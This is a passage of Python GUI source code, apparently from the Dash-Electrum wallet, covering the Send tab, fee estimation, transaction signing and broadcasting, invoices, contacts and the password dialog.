self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
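# Fee slider callback: with dynamic fees, persist the selected mempool depth
# or fee level; otherwise persist the chosen static per-kB fee rate, then
# refresh the displayed feerate/fee and recompute the transaction fee.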
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so clear the modified flag on the
# other field so that the edited setting is the one that stays frozen
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_kb())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Dash-Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 duffs might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(30)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
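# Recolour the amount/fee/feerate fields: red when funds are insufficient,
# blue for auto-filled values, default for user-entered ones.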
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
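# Usage example: see do_sign() and show_seed_dialog() below, which are
# decorated with @protected and receive 'password' as a keyword argument.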
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
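# Returns an absolute fee amount if the fee field is frozen, a callable
# estimator if the feerate field is frozen, or None for automatic estimation.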
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/kB feerate
amount = 0 if amount is None else amount # sat/kB feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
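# Collect and validate the outputs, fee estimator, description and coins
# from the Send tab; returns None (implicitly) when validation fails.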
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Dash Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Dash Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast_transaction(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
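# Callback for util.parse_URI: may run outside the GUI thread, so the
# result is handed back to the GUI via Qt signals.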
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid Dash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_kb())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
l.setObjectName("utxo_container")
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def create_proposals_tab(self):
# relative import, consistent with the other local GUI modules imported above
from .masternode_budget_widgets import ProposalsTab
self.proposals_list = ProposalsTab(self)
return self.proposals_list
def update_proposals_tab(self):
# Disabled until API is stable.
return
if not self.masternode_manager:
return
self.proposals_list.update(list(self.network.all_proposals))
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
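# Bind each Commands method into the console namespace; self.password_dialog
# is passed along for commands that require the wallet password.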
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_dash.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
